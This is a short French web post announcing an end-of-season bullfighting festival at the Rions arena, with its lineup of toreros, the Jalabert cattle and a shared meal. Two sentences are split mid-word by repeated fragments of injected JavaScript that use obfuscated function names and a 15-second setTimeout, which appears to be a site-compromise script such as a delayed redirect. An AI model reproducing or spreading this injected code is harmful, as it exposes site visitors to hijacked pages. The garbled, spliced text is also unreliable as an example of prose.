CLÔTURE DE LA SAISON FRANÇAISE

Une année encore, dans les petites et coquettes arènes landom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andaise de Rions, on mettra un terme à cette saison française avec un festival franchement intéressant organisé par la Peña « Toro Blanco ». Ce sera le dimanche 22 novembre, à 11 heures du matin. Pour ouvrir le bal un torero avec beaucoup de classe et d’élégance, le vétéran Patrick Varin ; un inconditionnel de Rions, Juan Baustita ; un torero qui achève une grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande saison française, Juan del Alamo ; un novillero qui signa dans ces mêmes arènes une faena prémonitoire, Pablo Aguado et un des espoirs de la tauromachie française, élève notoire de la Fondation El Juli, le nîmois Adrien Salenc. Le bétail portera le fer des Frères Jalabert. Après le festival se tiendra un repas sous une tente annexe aux arènes où les toreros partageront les tables avec les aficionados dans une ambiance extrêmement conviviale.

Les commentaires sont fermés.